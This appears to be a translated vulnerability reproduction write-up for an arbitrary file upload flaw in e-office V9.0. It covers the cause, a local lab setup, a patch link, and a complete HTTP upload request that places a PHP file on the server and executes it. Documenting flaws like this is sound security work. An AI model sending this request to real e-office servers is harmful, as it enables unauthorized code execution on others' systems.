1. Vulnerability detection script
A simple detection script written by myself, you can take a look if you are interested
2. Vulnerability causes
This vulnerability is caused by the failure of e-office to correctly process user input in the upload module. Attackers can construct malicious upload data packets to achieve arbitrary code execution. The official whitelist verification is performed on the suffix name of the uploaded file. The following is the official code snippet after the vulnerability is fixed:
3. Affect the version
The version affected by this vulnerability is V9.0
4. Shooting range construction
Just run the e-office software you downloaded yourself
This is to install your own default IP address and port number
5. Vulnerability recurrence
Browser access can see the following login page, the default account is admin, no password required
When you log in to capture the packet and get the response packet, you need to pay attention to the PHPSESSID of the response packet. If you want to write a detection script, you need to get it. Needless to say, this is identity verification
Then click on the login page to get the request package, modify the request package as follows, and see the logo-eoffice.php, which means the upload is successful.
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: win-08mtfbul1kp:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://win-08mtfbul1kp:8082/general/index9.php
Cookie: LOGIN_LANG=cn; PHPSESSID=e84040eb45cb321d9806d2e0518c1ba0
Content-Length: 194
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
Visit the following address:
http://win-08mtfbul1kp:8082/images/logo/logo-eoffice.php
You can see that the code runs successfully. Or you can see that the local folder code is successfully uploaded
6. Restoration plan
The manufacturer has provided a vulnerability patch solution, and users are recommended to download and use:
http://v10.e-office.cn/eoffice9update/safepack.zip